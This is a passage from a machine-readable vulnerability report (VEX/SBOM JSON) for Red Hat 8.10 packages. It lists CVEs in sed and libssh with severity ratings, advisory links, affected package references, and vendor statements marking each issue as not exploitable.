          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5958",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        367
      ],
      "description": "When sed is invoked with both -i (in-place edit) and --follow-symlinks, the function open_next_file() performs two separate, non-atomic filesystem operations on the same path: \n1. resolves symlink to its target and stores\u00a0the resolved path for determining when output is written,\n2. opens the original symlink path\u00a0(not the resolved one) to read the file. \nBetween these two calls there is a race window. If an attacker atomically replaces the symlink with a different target during that window, sed will: read content from the new (attacker-chosen) symlink target and write the processed result to the path recorded in step 1.\u00a0This can lead to arbitrary file overwrite with attacker-controlled content in the context of the sed process.\n\n\nThis issue was fixed in version 4.10.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5958"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/13/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5958"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-5958"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r7w-j29g-xqx8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5958"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5958"
        },
        {
          "url": "https://www.gnu.org/software/sed"
        },
        {
          "url": "https://www.gnu.org/software/sed/"
        }
      ],
      "published": "2026-04-20T12:16:08+00:00",
      "updated": "2026-06-17T10:59:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.5-5.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-59843",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        835,
        400
      ],
      "description": "A flaw was found in libssh. A remote authenticated peer can advertise a zero maximum packet size in SSH_MSG_CHANNEL_OPEN, causing later channel writes to loop indefinitely and consume CPU, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59843"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59843"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498176"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59843.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59843"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59843"
        }
      ],
      "published": "2026-07-21T12:18:57+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59844",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        789
      ],
      "description": "A flaw was found in libssh. A remote authenticated client can issue SSH_FXP_READ requests with an arbitrarily large length, causing a libssh SFTP server to allocate excessive memory and potentially exhaust it through repeated requests.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59844"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59844"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498177"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59844.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59844"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59844"
        }
      ],
      "published": "2026-07-21T12:18:57+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
